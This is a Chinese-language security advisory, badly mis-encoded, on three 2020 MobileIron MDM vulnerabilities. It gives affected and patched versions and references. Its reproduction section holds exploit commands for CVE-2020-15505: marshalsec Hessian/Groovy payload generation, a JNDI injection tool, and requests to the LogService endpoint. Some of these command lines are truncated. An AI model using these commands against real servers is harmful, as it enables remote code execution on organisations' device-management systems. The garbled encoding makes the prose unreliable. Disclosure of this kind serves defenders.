MobileIron | 11ÔÂMDM¶à¸ö°²È«·ì϶¹«¸æ
°ä²¼¹¦·ò 2020-11-260x00 ·ì϶¸ÅÊö
²úÆ·Ãû³Æ | CVE ID | Àà ÐÍ | ·ì϶µÈ¼¶ | Ô¶³ÌÀûÓà |
MobileIron Core & Connector¡¢Sentry¡¢Monitor and Reporting Database (RDB) | CVE-2020-15505 | RCE | ÑϳÁ | ÊÇ |
MobileIron Core£¦Connector | CVE-2020-15506 | Éí·ÝÑéÖ¤ÈÆ¹ý | ÑϳÁ | ÊÇ |
MobileIron Core | CVE-2020-15507 | ËÁÒâÎļþ¶ÁÈ¡ | ¸ßΣ | ÊÇ |
0x01 ·ì϶ÏêÇé

MobileIronÊÇÈ«Çòµ±ÏÈÇÒ·¢Õ¹×îѸ¿ìµÄÒÆ¶¯IT½â¾ö¹æ»®³§ÉÌÖ®Ò»£¬ÔÚÈ«ÇòÓнü20000¼Ò¹«Ë¾Ê¹ÓÃMobileIronµÄÒÆ¶¯É豸ÖÎÀí½â¾ö¹æ»®£¨MDM£©¡£
2020Äê10ÔÂ22ÈÕ£¬MobileIron°ä²¼¸üв¼¸æ£¬MDMÖдæÔڵĶà¸ö°²È«·ì϶£¨CVE-2020-15505¡¢CVE-2020-15506ºÍCVE-2020-15507£©ÒÑÔÚ6ÔÂ15ÈÕ°ä²¼µÄ²¹¶¡Öб»½¨¸´¡£·ì϶ÏêÇéÈçÏ£º
MobileIronÔ¶³Ì´úÂëÖ´Ðзì϶£¨CVE-2020-15505£©
¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÔ¶³Ì´úÂëÖ´Ðзì϶£¬ÆäCVSSÆÀ·Ö9.8¡£¹¥»÷ÕßÄܹ»ÀûÓô˷ì϶ִÐÐËÁÒâ´úÂë²¢½ÚÔ칫˾µÄ·þÎñÆ÷¡£
¸Ã·ì϶µÄPoCÒÑÓÚ9ÔÂÔÚGithubÉϱ»°ä²¼¡£½üÈÕ£¬¸Ã·ì϶ÔÚ±»APT×éÖ¯ºÍÍøÂç·¸×ï×éÖ¯»ý¼«³¢ÊÔÀûÓá£
·ì϶¸´ÏÖ£º
Groovy·´ÐòÁл¯Ó×¹¤¾ß
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "
python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

±¾µØJNDI×¢Èë
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'


Ó°ÏìÁìÓò£º
MobileIron Core£¦Connector£º10.3.0.3¼°Ö®Ç°°æ±¾¡¢10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3¡¢10.5.1.0¡¢10.5.2.0¡¢10.6.0.0
Sentry£º9.7.2¼°Ö®Ç°°æ±¾¡¢9.8.0
Monitor and Reporting Database (RDB)£º2.0.0.1¼°Ö®Ç°°æ±¾
MobileIronÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶£¨CVE-2020-15506£©
¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶£¬ÆäCVSSÆÀ·Ö9.8¡£¹¥»÷Õß¿ÉÀûÓô˷ìÏ¶ÈÆ¹ýÉí·ÝÑéÖ¤»úÔì¡£
Ó°ÏìÁìÓò£º
MobileIron Core£¦Connector£º
10.3.0.3¼°Ö®Ç°°æ±¾
10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3
10.5.1.0¡¢10.5.2.0
10.6.0.0
MobileIronËÁÒâÎļþ¶ÁÈ¡·ì϶£¨CVE-2020-15507£©
¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öËÁÒâÎļþ¶ÁÈ¡·ì϶£¬ÆäCVSSÆÀ·Ö7.5¡£¹¥»÷Õß¿ÉÀûÓô˷ì϶¶ÁÈ¡ÎļþϵͳÖеÄÃô¸ÐÐÅÏ¢¡£
Ó°ÏìÁìÓò£º
MobileIron Core£º
10.3.0.3¼°Ö®Ç°°æ±¾
10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3
10.5.1.0¡¢10.5.2.0
10.6.0.0
0x02 ´ëÖý¨Òé
ĿǰMobileIronÒѾ°ä²¼ÁËÓйظüУ¬½¨Òé²ÎÉý¼¶ÖÁÈçϰ汾¡£
MobileIron Core & Enterprise Connector£º
v10.3.0.4¡¢v10.4.0.4¡¢v10.5.1.1¡¢v10.5.2.1¡¢v10.6.0.»ò¸ü¸ß°æ±¾¡£
MobileIron Sentry£º
v9.7.3¡¢v9.8.1»ò¸ü¸ß°æ±¾¡£
MobileIron Monitor and Reporting Database (RDB)£º
v2.0.0.2»ò¸ü¸ß°æ±¾¡£
²¹¶¡Á´½Ó£º
https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA
0x03 ²Î¿¼Á´½Ó
https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/
https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505
0x04 ¹¦·òÏß
2020-07-01 MobileIron°ä²¼°²È«²¼¸æ
2020-10-22 MobileIron¸üа²È«²¼¸æ
2020-11-26 VSRC°ä²¼°²È«¹«¸æ
0x05 ¸½Â¼
CVSSÆÀ·Ö³ß¶È¹ÙÍø£ºhttp://www.first.org/cvss/



¾©¹«Íø°²±¸11010802024551ºÅ